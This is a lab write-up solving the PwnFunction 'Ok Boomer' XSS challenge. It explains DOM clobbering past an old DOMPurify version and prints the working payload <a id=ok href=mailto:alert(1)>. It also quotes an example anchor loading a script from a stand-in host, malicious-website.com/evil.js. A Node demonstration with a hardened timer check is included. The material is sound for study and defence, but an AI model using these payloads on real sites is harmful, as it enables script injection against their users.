Ok Boomer PwnFunction XSS Solution

Ok Boomer from PwnFunction teaches you the DOM Clobbering technique, which allows you to execute XSS by writing normal HTML tags.

Let’s analyze the code first.

Ok Boomer PwnFunction XSS Code

The code uses a library called DOMPurify, which should sanitize the user’s input and remove all dangerous code that might lead to XSS attacks. The library is currently at version 2.3.6, but the one used in the game is version 2.0.7.

But then there’s a timeout function that takes a variable called “ok” and calls it after 2 seconds. The weird thing is that the variable is not defined at all.

Here we can exploit something called DOM Clobbering (you can read more about it here and here). In short, DOM Clobbering allows us to achieve XSS by writing pure HTML, because there are global variables in JavaScript that we can manipulate by writing our own HTML.

Let me explain a bit more. A variable such as “ok” can be defined either with var x, for example, or by creating an element with id=x; when you then reference the variable x, it will automatically get the value attribute of the element x.

This means that if we create an element like the following:

<a id=someObject><a id=someObject name=url href=//malicious-website.com/evil.js>

Now let’s edit it according to our needs:

<a id=ok href=mailto:alert(1)>

So we specified the id as “ok” in order for the browser to create a variable called ok (which is what we need).

Then the default value that will be called is the href. I tried multiple ways, but none of them worked except when I used the this:here syntax, so I used mailto, but you can use whichever one you like.
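Why the this:here form of the href works, and how the timer call can be hardened, as an added example that is not part of the challenge or of the original write-up. It runs in Node rather than a browser, so `clobberedAnchor`, `timerSource`, `runAsTimerString` and `scheduleSafely` are hypothetical helpers that model two browser behaviours: an anchor element converts to its href when turned into a string, and `setTimeout` compiles a non-function argument as script.

```javascript
// Constructed stand-in for the element that `window.ok` resolves to once
// <a id=ok href=...> is in the page. A real anchor element stringifies to its
// href; this object models only that behaviour so the example runs in Node.
function clobberedAnchor(href) {
  return { tagName: 'A', href, toString() { return this.href; } };
}

// Model of how a browser treats setTimeout's first argument: a function is
// called as-is, anything else is converted to a string and compiled as script.
// Returns the source text that would be compiled, or null for a function.
function timerSource(handler) {
  return typeof handler === 'function' ? null : String(handler);
}

// Compiles and runs `src` the way a string timer would, with `alert` replaced
// by a recorder so the effect is observable without a browser.
function runAsTimerString(src) {
  const calls = [];
  new Function('alert', src)((arg) => calls.push(arg));
  return calls;
}

// Hardened sink: refuse anything that is not a real function, so a clobbered
// global (an element object) never reaches the string-compiling path.
function scheduleSafely(handler, ms, timer = setTimeout) {
  if (typeof handler !== 'function') {
    throw new TypeError('timer handler must be a function, got ' +
      Object.prototype.toString.call(handler));
  }
  return timer(handler, ms);
}

function demo() {
  const ok = clobberedAnchor('mailto:alert(1)'); // payload from the write-up
  const src = timerSource(ok);                   // text the timer would compile
  const calls = runAsTimerString(src);           // `mailto:` parses as a label
  let rejected = false;
  try { scheduleSafely(ok, 2000); } catch (e) { rejected = e instanceof TypeError; }
  return { src, calls, rejected };
}

console.log(demo());
```

In the page itself the equivalent fix is to pass `setTimeout` a function defined by the script and to check `typeof ok === 'function'` before using any global that markup could shadow.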

And that’s all for the Ok Boomer PwnFunction XSS level.